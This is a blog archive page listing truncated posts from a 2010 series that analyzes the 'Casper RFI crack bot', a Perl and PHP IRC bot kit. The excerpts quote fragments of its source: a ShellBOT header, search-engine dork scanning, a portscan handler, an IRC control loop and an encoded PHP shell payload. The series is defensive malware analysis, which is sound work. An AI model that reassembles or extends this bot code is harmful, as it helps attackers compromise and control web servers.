Irregular Expressions:

www perl bot


September 26, 2010  8:47 PM

Casper RFI crack bot – Part 16 – Last Part



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So, looking over all of the scripts, what do we have? What is in use here is a collection of scripts by various authors of multiple nationalities, written in different languages. In a best-case scenario this is a script kiddie, judging also by the fact that he left his Gmail address in the script that was...

September 26, 2010  12:50 AM

Casper RFI crack bot – Part 15



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

What this appears to be looking for is more machines to exploit, big surprise! I followed it back for a bit and this is what I ended up with.

sub se_yahoo {
  my ($chan,$key,$nf) = @_;

sub s_engine {
    my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;

sub s_cari {
  #Type: 1 = Cari...


September 26, 2010  12:23 AM

Casper RFI crack bot – Part 14



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

One more script listed at the top of the main one.

$filebotscan = "scan.txt";

It's full of all sorts of stuff; nothing really caught my attention until I reached this.

##[ GOOGLE ]##
sub se_google {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my...


September 25, 2010  9:21 PM

Casper RFI crack bot – Part 13



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

There are a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my...


September 16, 2010  10:05 PM

Casper RFI crack bot – Part 12



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So what is going on next,

my $line_temp;
while( 1 ) {
     while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
     delete($irc_servers{''}) if (defined($irc_servers{''}));
     &DCC::connections;
     my @ready = $sel_cliente->can_read(0.6);
     next...


September 15, 2010  10:14 AM

Casper RFI crack bot – Part 11



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

OK, we have a couple more to go through. Next is:

$filebotperl = "iso.txt";

I love comments; at least we don't have to guess what this is for.

#!/usr/bin/perl
#
#  ShellBOT by: devil__
#       Greetz: Puna, Kelserific
# Comandos:
#           @oldpack <ip>...


September 9, 2010  9:10 AM

Casper RFI crack bot – Part 10



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

The next on the list is:

$filebotphp  = "bot.txt";

This looks pretty specific to the IRC bot, but there is something encoded again, just like in the other scripts.

$dc_source =...


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So it looks like sh.txt is all about shell access. Wow, what a surprise! The next item is def.txt; there is not a whole lot in there besides the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz. Let's unpack it and look around. It's from a project...


August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...

